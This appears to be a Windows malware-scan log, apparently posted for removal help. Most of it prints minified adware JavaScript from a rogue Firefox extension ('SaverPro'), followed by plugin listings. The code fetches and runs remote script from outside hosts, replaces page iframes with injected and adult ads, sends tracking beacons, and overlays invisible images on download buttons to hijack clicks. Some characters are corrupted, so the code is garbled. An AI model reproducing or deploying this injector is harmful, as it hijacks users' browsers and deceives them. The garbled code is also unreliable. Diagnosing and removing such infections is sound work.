_wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1== B){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch( B){return 0}else 
_wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 
DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['ybrant_apn3785',3669],['dsnr_dasa2',166],['dsnr_nntbr2',166],['cpx_cybersoft3_new',4999],['matomy_adj48_new',1000]],[['matomy_strm53',5000],['mari_strm_D',5000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function( B){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('XZl0Fxw8=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ads.incmd01.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| 
_zyad.location.indexOf('=511181')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting bleep gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function( B){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case 
c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function( B){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s9954933816504950379\"))continue}catch©{try{if(d[i].getAttribute(\"s9954933816504950379\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287609')>-1||d[i].src.indexOf('=511181')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s9954933816504950379\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a, B){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a, B)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&& B){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d]( B);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 
1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'XZl0Fxw8=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s9954933816504950379\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{ybrant_apn3785:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';var 
arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd03.com/creative/2-002136823-00001i;size='+arr+';tag_id=3785;ref='+rfr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},cpx_cybersoft3_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=3294776&size=+size+&referrer=${REFERER_URL}' (atp?atp:1), [1721,size]);}}catch(e){return !1;}},matomy_adj48_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223120&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1722,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var 
atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},mari_strm_D:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168698\",\"300x250\":\"3168699\",\"160x600\":\"3168700\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1708,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return 
function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s8347115683178558813',szy_domain:[\"complletegood.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]],checkif:function(ifr){return (ifr.getAttribute('s8347115683178558813') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"777\",eid:\"83\",hid:\"8347115683178558813\",lt:\"11.05\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"XZl0Fxw8\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"!=c[b].name.toLowerCase()&&\"description\"!=c[b].name.toLowerCase()||(a+=\" \"+c[b].content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a, B){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},init:function(){var 
a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a[b])||(a[b].setAttribute(adzy653rk.imp.rattr,\"true\"),a[b].setAttribute(\"replaced\",\"true\"),c.push(a[b]));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push( B);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function( B){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? 
by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=8347115683178558813&eid=83&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=8347115683178558813&eid=83&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++ B)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=\nb.onload=function(){try{b.parentNode.removeChild( B)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild( B)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse( B):eval(\"ifrl = \"+ B)}catch(d){}if(c&&c.length)for(a=\n0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c, B){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a, B){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var 
d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";\ntry{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),\ne=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt( B);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com s-tag.z5x.net ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com kncxsw.com creative.rev2pub.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.exoclick.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com ads.ad-maven.com ad.adnetwork.net 
ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com a.ad-sys.com hxewaz.com ads.yahoo.com tala.intlsources.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=287609\")==-1 &&adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=SaverPro&systemid=8347115683178558813&ext=SaverPro\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" 
style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),\nf.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",g=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return 
FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:8.0.1489
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:31.0
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@canon.com/MycameraPlugin: C:\Program Files\Canon\ZoomBrowser EX\Program\NPCIG.dll (CANON INC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.25.2: C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.25.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
